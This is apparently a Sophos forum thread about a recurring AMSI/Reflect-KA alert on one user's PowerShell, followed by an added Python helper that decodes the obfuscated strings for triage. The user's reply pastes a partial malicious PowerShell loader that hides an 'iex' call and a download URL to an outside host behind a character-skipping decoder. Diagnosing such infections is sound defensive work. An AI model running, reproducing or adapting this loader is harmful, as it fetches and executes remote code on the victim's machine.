
AMSI/Reflect-KA Detection

Hello everyone,

We get the following alert:

What happened: We could not clean up a threat.

Where it happened: computer name

Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

What was detected: AMSI/Reflect-KA

How severe it is: High

What Sophos has done so far: We attempted to clean up a threat.

It is only for one user; it used to be two. I cleaned the temp files for both users on their respective PCs, and it seems that fixed the issue for the first user, or maybe it was just a coincidence.

However, this one user's account on this PC keeps giving us this detection.

It seems to be triggered by two different things, but they all lead to PowerShell.

Please see the images, hope that helps.

Any idea about this? Much appreciated.

  • Please click on Microsoft PowerShell at the top of the chart and look at the window on the right to see what the command line is.

  • Hello,

    Thanks for your response

    This is what I got

    "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Throug9 ([String]$Gastrocele){$Navigatr = 'su'+'bstring';For($Dakshe=1; $Dakshe -lt $Gastrocele.Length-1; $Dakshe+=(1+1)){$Traadethv=$Traadethv+$Gastrocele.$Navigatr.Invoke($Dakshe, 1)};$Traadethv;}$Reticu=Throug9 ' hRtftRpKs :S/ /Tl eBd sDhDeHe t m eKtCaYlu.DcKosm /TZ ZSZ /AETmEpAoCrMtTm .TiKnMfU ';$Traadethv01=Throug9 ' i e xD ';$Mlkevej = Throug9 ' \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ';.($Traadethv01) (Throug9 ' $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ') ;.($Traadethv01) (Throug9 'P$ M lTk eLvEe jD= $CTEahbNsOl iSs tUe 2R+K$ MSl kAeCvPeEjM ') ;.($Traadethv01) (Throug9 'B$ VBr gheNlFsBh eRdSsB M=O (D(OgSw mSiU w i nG3 2 _VpFrUoTcSe sPs B-aFS VPDr o cSeFsosNIIdK= $ { PDI D }a)T. CCoDm mVa n d LNi n eT)u - s p l ibtL K[Nc hSaQr ] 3f4 ');.($Traadethv01) (Throug9 's$FJPu dEiT t= F$ VKr g e l sSh eBdEsT[ $ VPrNg e lssVh eSd s . cCoGuOnFt -S2O] ');.($Traadethv01) (Throug9

    Many Thanks
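The command line above hides every string behind a small "take every other character" routine (the `Throug9` function), which is why static signatures miss it and AMSI catches it when the script runs. As an added example that is not part of the post or of any Sophos tooling, the following Python helper reproduces that substring loop so a responder can read the staged strings without executing the script; the function and variable names are copied from the posted command line, while the first literal (the download stage) is a constructed placeholder pointing at example.invalid rather than the real one.

```python
import re


def unmix(s: str) -> str:
    """Same transform as the posted Throug9 function: walk i = 1, 3, 5, ...
    while i < len(s) - 1 and keep s[i]; the even positions are filler."""
    return "".join(s[i] for i in range(1, len(s) - 1, 2))


def decode_literals(cmd: str, decoder_name: str) -> list[str]:
    """Find every single-quoted literal handed to the decoder function and
    decode it in order, so the staged commands can be read, not run."""
    pattern = re.escape(decoder_name) + r"\s*'([^']*)'"
    return [unmix(lit) for lit in re.findall(pattern, cmd)]


def triage(cmd: str, decoder_name: str) -> dict:
    """Decode and flag what a responder looks for first: an Invoke-Expression
    alias (execution of decoded text) and any URL (the download stage)."""
    decoded = decode_literals(cmd, decoder_name)
    return {
        "decoded": decoded,
        "has_iex": any(d.strip().lower() in ("iex", "invoke-expression")
                       for d in decoded),
        "urls": [d for d in decoded if re.match(r"^\s*https?://", d, re.I)],
    }


# Constructed sample: the harmless literals from the post, with the download
# URL replaced by an example.invalid placeholder (spaces used as filler).
SAMPLE = (
    "Function Throug9 ([String]$Gastrocele){...};"
    "$Reticu=Throug9 ' h t t p s : / / e x a m p l e . i n v a l i d / a . i n f ';"
    "$Traadethv01=Throug9 ' i e xD ';"
    r"$Mlkevej = Throug9 ' \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ';"
    ".($Traadethv01) (Throug9 ' $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ')"
)

if __name__ == "__main__":
    result = triage(SAMPLE, "Throug9")
    for line in result["decoded"]:
        print(repr(line))
    print("invoke-expression alias present:", result["has_iex"])
    print("download URLs:", result["urls"])
```

The decoded strings (an `iex` alias, the 32-bit PowerShell path and `$env:windir`) are the content AMSI scans in memory, so the artefact to find is whatever re-launches this command line for that user's account, not a file in the temp folder.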

